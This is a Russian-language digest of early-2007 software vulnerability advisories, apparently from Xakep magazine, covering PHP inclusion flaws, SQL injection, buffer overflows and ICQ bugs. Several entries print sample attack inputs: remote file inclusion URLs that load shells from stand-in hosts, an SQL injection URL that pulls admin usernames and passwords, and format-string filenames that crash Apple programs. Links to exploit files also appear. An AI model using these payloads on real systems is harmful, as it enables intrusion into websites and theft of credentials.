Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. 
Уязвимость существует из-за ошибки в проверке входных данных при обработке «RCPT TO» команд. 
Атакующий может передать специально сформированные данные, в качестве параметра уязвимой команде, 
что приведет к выполнению произвольного кода.

Эксплоиты:
http://www.xakep.ru/post/36607/Imail_Remote_Buffer_Overflow_Exploit.txt
http://www.xakep.ru/post/36607/Imail_Remote_Buffer_Overflow_Exploit2.txt




[ 02 февраля, 2007 ]

Нарушение конфиденциальности информации в zenphoto

Программа:  zenphoto 1.x

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной 
информации на целевой системе. Уязвимость существует из-за ошибки обработки входных данных в параметре 
«album» сценарием index.php. Атакующий может раскрыть содержимое директорий внутри web root.




[ 02 февраля, 2007 ]

Выполнение произвольного кода и отказ в обслуживании в ZABBIX

Программа:  ZABBIX 1.x

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. 
Уязвимость существует из-за ошибки в проверке входных данных при обработке SNMP ответов. 
Атакующий может передать специально сформированный SNMP пакет, содержащий неправильный IP адрес, 
что позволит выполнить произвольный код или осуществить DoS атаку.




[ 02 февраля, 2007 ]

Выполнение произвольных команд в Windows Vista

Программа: Windows Vista

Уязвимость позволяет удаленному злоумышленнику выполнить произвольные команды на целевой системе. 
Уязвимость существует из-за ошибки во встроенной технологии распознавания голоса Speech Recognition. 
При включении данной функциональности атакующий может обманным образом заставить пользователя зайти на сайт, 
содержащий звуковые файлы с записанными командами (например, “open shell”, “copy”, “delete”, ”shutdown”), 
что приведет к выполнению произвольных команд на целевой системе.




[ 02 февраля, 2007 ]

PHP-инклюдинг в Portail Web Php

Программа: Portail Web Php 2.5.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «site_path» сценарием includes.php. 
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

/includes/includes.php?site_path=http://site.com/shell.txt?%00




[ 02 февраля, 2007 ]

PHP-инклюдинг в WebBuilder

Программа: WebBuilder 2.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «GLOBALS[core][module_path]» 
сценарием StageLoader.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе 
с привилегиями Web сервера.

Пример:

http://victim.com/[path]/library/StageLoader.php?GLOBALS[core][module_path]=Evil.txt?




[ 02 февраля, 2007 ]

PHP-инклюдинг в Epistemon

Программа: Epistemon 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «inc_path» сценарием common.inc.php. 
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://www.hedef.com/[path]/plateforme/code/inc/common.inc.php?inc_path=Evil.txt




[ 02 февраля, 2007 ]

PHP-инклюдинг в phpEventMan

Программа: phpEventMan 1.0.2

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «level» сценарием text.ctrl.php. 
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

www.target.com/script_pat/Shared/controller/text.ctrl.php?level=http://evilscripts ?
www.target.com/script_pat/UserMan/controller/common.function.php?level=http://evilscripts ?




[ 02 февраля, 2007 ]

PHP-инклюдинг в SIPS

Программа: SIPS 0.3.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «config[sipssys]» 
сценарием box.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе 
с привилегиями Web сервера.

Пример:

/sipssys/code/box.inc.php?config[sipssys]=http://[target]/[path]/shell.x




[ 02 февраля, 2007 ]

Переполнение буфера в GOM Player

Программа: GOM Player 2.x

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. 
Уязвимость существует из-за ошибки в проверке входных данных при обработке ASX playlist файлов, 
содержащих слишком длинный URI в теге "ref href". Атакующий может передать специально сформированные списки ASX, 
что приведет к выполнению произвольного кода.




[ 01 февраля, 2007 ]

PHP-инклюдинг в Cerulean Portal System

Программа: Cerulean Portal System 0.7b

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» 
сценарием portal.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе 
с привилегиями Web сервера. 

Пример:

www.[target].com/[script_pat]/portal/portal.php?phpbb_root_path=http://evilscripts?




[ 01 февраля, 2007 ]

Переполнение буфера в FreeType

Программа:  FreeType 2.2.1

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. 
Уязвимость существует из-за ошибки в проверке входных данных при обработке TTF файлов. Атакующий 
может передать специально сформированные TTF файлы, что приведет к выполнению произвольного кода. 

Пример:

http://www.securityfocus.com/data/vulnerabilities/exploits/18326.zip




[ 01 февраля, 2007 ]

Переполнение буфера в CA BrightStor ARCserve

Программа:  CA BrightStor ARCserve

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. 
Уязвимость существует из-за ошибки в проверке входных данных в lgserver.exe. Атакующий может передать 
специально сформированные данные, что приведет к переполнению стека и выполнению произвольного кода.

Эксплоит: http://www.xakep.ru/post/36579/CA_BrightStor_Arcserve_stack_overflow_exploit.txt




[ 01 февраля, 2007 ]

SQL-инъекция в Hunkaray Duyuru Scripti

Программа: Hunkaray Duyuru Scripti

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием oku.asp. 
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL 
команды в базе данных приложения.

Пример:

http://[SITE]/oku.asp?id=-1%20union+all+select+0,kullaniciadi,sifre,3+from+admin




[ 01 февраля, 2007 ]

PHP-инклюдинг в Omegaboard

Программа: Omegaboard 1.0beta4

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» 
сценарием functions.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой 
системе с привилегиями Web сервера.

Пример:

www.[target].com/[script_pat]/includes/functions.php?phpbb_root_path=http://evilscripts?




[ 01 февраля, 2007 ]

PHP-инклюдинг в JV2 Folder Gallery

Программа: JV2 Folder Gallery 3.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «"galleryfilesdir"» 
сценарием gallery/theme/include_mode/template.php. Удаленный пользователь может выполнить произвольный 
PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости требует 
включение опции "register_globals" в конфигурационном файле PHP.

Пример:

http://www.Site.com/[JV2 Folder Gallery]/gallery/theme/include_mode/template.php?galleryfilesdir=[Shell]




[ 01 февраля, 2007 ]

Нарушение конфиденциальности информации в Gentoo Linux

Программа: Gentoo Linux

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной 
информации на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в Acme Thttpd. 
Атакующий может получить содержимое файлов, к которым имеет доступ 'thttpd' процесс.




[ 01 февраля, 2007 ]

Отказ в обслуживании в GTK2

Программа: GTK2

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. 
Уязвимость существует из-за ошибки в проверке входных графических данных в функции GDKPixBufLoader. 
Атакующий может передать специально сформированные данные, что приведет к отказу в обслуживании приложения, 
использующего библиотеку.

Пример:

http://www.securityfocus.com/data/vulnerabilities/exploits/crash.mbox




[ 01 февраля, 2007 ]

Переполнение буфера в Links и ELinks

Программа:
Links 2.1
ELinks 0.11.1

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. 
Уязвимость существует из-за ошибки в проверке входных данных, содержащих SMB команды. 
Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного кода.

Эксплоит: http://www.xakep.ru/post/36567/Links_ELinks_buffer_overflow_exploit.txt




[ 01 февраля, 2007 ]

SQL-инъекция в ASPSide.Com

Программа: ASPSide.Com

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «TForum» сценарием User_Confirm.ASP. 
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в 
базе данных приложения.




[ 01 февраля, 2007 ]

Нарушение конфиденциальности информации в Microsoft Outlook Express

Программа: Microsoft Outlook Express 6.0

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к 
конфиденциальной информации в доменах. Уязвимость существует из-за ошибки в проверке входных 
данных при обработке «MHTML:» URI. Эксплуатирование уязвимости приведет к междоменному раскрытию информации. 
Ранее данная уязвимость была найдена в Internet Explorer, но уязвимый компонент обнаружен и в Outlook Express.

Пример:

http://www.securityfocus.com/data/vulnerabilities/exploits/mhtml.zip




[ 01 февраля, 2007 ]

Отказ в обслуживании в Wireshark

Программа: Wireshark (formerly Ethereal) 0.x

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. 
Уязвимость существует из-за ошибок в TCP, HTTP, IEEE 802.11, и LLT анализаторах при проверке входных данных. 
Атакующий может передать специально сформированный пакет или данные сохраненные в файл, что приведет 
к отказу системы в обслуживании.




[ 01 февраля, 2007 ]

Переполнение буфера в многочисленных продуктах Apple

Программа: Apple Installer, Software Update, iChat, iPhoto, Help Viewer, Safari и iMovie

Уязвимость позволяет удаленному злоумышленнику осуществить DoS атаку или выполнить произвольный код 
на целевой системе. Уязвимость существует из-за ошибки форматирования строк при проверке входных 
данных в функциях, входящих в Apple's AppKit framework:

NSBeginAlertSheet
NSBeginCriticalAlertSheet
NSBeginInformationalAlertSheet
NSGetAlertPanel
NSGetCriticalAlertPanel
NSGetInformationalAlertPanel
NSReleaseAlertPanel
NSRunAlertPanel
NSRunCriticalAlertPanel
NSRunInformationalAlertPanel
NSLog

Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного 
кода или осуществлению DoS атаки.

Примеры:

joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.download
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.imovieproj
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.help
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.download
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.imovieproj
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.help
joe-schmoes-computer:~/Library/Logs/CrashReporter js$ ls
Help Viewer.crash.log Safari.crash.log iMovie HD.crash.log





		>> BONUS <<

	VERY CRITICAL BUG-OVERVIEW

[ 06 мая, 2003 ]

Шесть уязвимостей в ICQ

В Mirabilis ICQ обнаружено шесть уязвимостей. Уязвимости могут использоваться для DoS нападений 
против ICQ пользователей или для выполнения произвольного кода на целевой системе пользователя.

   1. Уязвимость форматной строки в POP3 клиенте в поле UIDL.

      Уязвимость форматной строки обнаружена в ICQ POP3 клиенте (POP3.dll) в команде UIDL. (RFC 1939). 
      Злонамеренный POP3 сервер может вставить спецификации формата в сообщение UIDL ответа и выполнить 
      произвольные команды на POP3 клиенте с привилегиями текущего пользователя.


   2. Целочисленное переполнение буфера в POP3 клиенте в поле "Subject"

      Удаленный атакующий может послать поле "Subject", размером примерно 33 КБ, чтобы вызвать отрицательное 
      значение параметра, что приведет к переполнению буфера в POP3 клиенте. В результате работа клиента аварийно 
      завершится.


   3. Целочисленное переполнение буфера в POP3 клиенте в поле "Date"

      Удаленный атакующий может послать поле "Date", размером примерно 32 КБ, чтобы вызвать отрицательное 
      значение параметра, что приведет к переполнению буфера в POP3 клиенте. В результате работа клиента 
      аварийно завершится.


   4. Спуфинг в “Features on Demand” (возможности по требованию).

      URL, который используется для загрузки модулей в 'Features on Demand', жестко прописан в подкаталоге 
      "\DataFiles" в ICQ директории. Нападение возможно из-за недостатка опознавательных методов, 
      используемых при загрузке новых пакетов. Атакующий может имитировать 'package repository service', 
      подделывая URL адрес и устанавливая другой источник для загрузки злонамеренного программного обеспечения 
      на системе ICQ клиента.


   5. DoS рекламными баннерами.

      URL, используемый для загрузки баннеров имеет следующий формат: 
      "http://web.icq.com/client/ate/ad-handler/ad_468/0,,[RANDOM],00.htm" Где [RANDOM] – положительное 
      целое 16 битное случайное число.
      Библиотека для обработки URL уязвима к ошибочным атрибутам, указанным в тэге <table>. 
      Определяя значение атрибута “width" равным ‘-1’, библиотека будет использовать 100% CPU, 
      что приведет к нарушению работы ICQ и всей системы. Нападение возможно из-за недостатка опознавательных 
      методов, используемых в запросах. Атакующий может имитировать "ADS server" , подделывая URL адрес и 
      устанавливая другой источник для загрузки злонамеренных баннеров.


   6. Уязвимость в проверке правильности ввода в ICQ GIF parsing/rendering библиотеке.

      При анализе GIF89a заголовка файла, ICQ GIF parsing/rendering библиотека ожидает одно из значений GCT 
      (Global Color Table) или LCT (Local Color Table) после "Image Descriptor". Когда ни одна из этих таблиц 
      цветов не существует, библиотека будет работать со сбоями.

Уязвимость обнаружена в Mirabilis ICQ Pro 2003a client.




[ 22 декабря, 2006 ]

Множественные уязвимости в @Mail

Программа:
@Mail 3.x
@Mail 4.x

Найденные уязвимости позволяют удаленному злоумышленнику выполнить XSS нападение и скомпрометировать целевую систему.

1) Уязвимость возникает из-за ошибки в обработке входных данных перед возвращением их пользователю. 
   Атакующий может выполнить произвольный HTML или JavaScript сценарий в браузере пользователя в контексте 
   безопасности уязвимого сайта.

2) Уязвимость возникает из-за ошибки, позволяющей пользователям выполнить определенные действия через 
   HTTP запросы без выполнения проверки пользовательских запросов.

<< _end;